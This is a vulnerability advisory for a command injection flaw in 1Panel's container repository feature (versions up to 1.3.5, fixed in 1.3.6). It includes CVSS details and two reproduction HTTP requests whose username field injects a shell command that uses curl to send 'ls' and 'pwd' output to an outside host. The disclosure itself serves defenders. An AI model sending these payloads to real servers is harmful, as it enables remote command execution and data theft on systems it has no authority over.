GoogleOSV:GHSA-Q2MX-GPJF-3H8X1Panel vulnerable to command injection when adding container repositories
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
42.1%
Impact
The authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories.
- Vulnerability analysis.
backend\app\api\v1\image_repo.go#create
backend\app\service\image_repo.go#CheckConn
- vulnerability reproduction.
POST /api/v1/containers/repo HTTP/1.1
Host: 192.168.109.152:40982
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-CSRF-TOKEN:
Content-Length: 446
Origin: http://192.168.109.152:40982
Connection: close
Referer: http://192.168.109.152:40982/containers/repo
Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e
{"id":2,"createdAt":"2023-04-13T19:57:43.633643247-07:00","name":"asdasd","downloadUrl":"127.0.0.1:8080","protocol":"http","username":"admin||curl http://192.168.109.1:12345/`ls`||","auth":true,"status":"Failed","message":"stderr: WARNING! Using --password via the CLI is insecure. Use --password-stdin.\nError response from daemon: Get \"http://127.0.0.1:8080/v2/\": dial tcp 127.0.0.1:8080: connect: connection refused\n","password":"Passw0rd"}
- Using update can be triggered multiple times.
POST /api/v1/containers/repo/update HTTP/1.1
Host: 192.168.109.152:40982
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-CSRF-TOKEN:
Content-Length: 447
Origin: http://192.168.109.152:40982
Connection: close
Referer: http://192.168.109.152:40982/containers/repo
Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e
{"id":2,"createdAt":"2023-04-13T19:57:43.633643247-07:00","name":"asdasd","downloadUrl":"127.0.0.1:8080","protocol":"http","username":"admin||curl http://192.168.109.1:12345/`pwd`||","auth":true,"status":"Failed","message":"stderr: WARNING! Using --password via the CLI is insecure. Use --password-stdin.\nError response from daemon: Get \"http://127.0.0.1:8080/v2/\": dial tcp 127.0.0.1:8080: connect: connection refused\n","password":"Passw0rd"}
Affected versions: <= 1.3.5
Patches
The vulnerability has been fixed in v1.3.6.
Workarounds
It is recommended to upgrade the version to v1.3.6.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/1Panel-dev/1Panel
Email us at [email protected]
Related
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
42.1%